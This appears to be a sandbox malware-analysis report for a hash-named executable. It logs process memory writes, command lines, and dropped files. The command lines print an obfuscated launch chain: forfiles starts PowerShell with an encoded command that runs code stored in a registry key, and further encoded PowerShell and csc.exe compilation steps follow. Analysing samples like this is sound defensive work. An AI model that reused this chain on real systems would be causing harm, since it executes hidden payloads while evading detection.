PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 636 wrote to memory of 1596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 636 wrote to memory of 1596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1596 wrote to memory of 3624 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1596 wrote to memory of 3624 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 3624 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4644 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4644 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 2752 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 2752 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4192 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 4192 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4192 wrote to memory of 4280 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4192 wrote to memory of 4280 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 3124 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 3124 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3124 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3124 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 444 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe C:\Windows\Explorer.EXE
PID 1276 wrote to memory of 2996 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe

"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82954 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82958 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82962 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82968 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82972 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82976 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82980 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82984 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp" "c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD692.tmp" "c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 444 -ip 444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 624

Network

Country Destination Domain Proto

Files

memory/444-134-0x00000000005CE000-0x00000000005DA000-memory.dmp

memory/444-135-0x00000000005CE000-0x00000000005DA000-memory.dmp

memory/444-136-0x0000000000590000-0x000000000059C000-memory.dmp

memory/444-137-0x0000000001000000-0x000000000106F000-memory.dmp

memory/444-138-0x00000000005A0000-0x00000000005B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\558DW1ID\favicon[1].ico

memory/1276-148-0x00000244DF5E0000-0x00000244DF602000-memory.dmp

memory/4644-150-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/1276-151-0x00000244F8F20000-0x00000244F8F22000-memory.dmp

memory/1276-149-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/1276-152-0x00000244F8F23000-0x00000244F8F25000-memory.dmp

memory/1276-153-0x00000244F8F26000-0x00000244F8F28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

memory/2752-155-0x00007FFDF9760000-0x00007FFDFA221000-memory.dmp

memory/2752-156-0x00000239B67B0000-0x00000239B67B2000-memory.dmp

memory/2752-157-0x00000239B67B3000-0x00000239B67B5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP

C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp

C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.dll

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP

C:\Users\Admin\AppData\Local\Temp\RESD692.tmp

C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.dll

memory/1276-169-0x00000244F8EB0000-0x00000244F8EC3000-memory.dmp

memory/444-170-0x00000000001C0000-0x00000000001CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/2996-172-0x0000000000B00000-0x0000000000B15000-memory.dmp

memory/2996-173-0x0000000007F50000-0x0000000007F65000-memory.dmp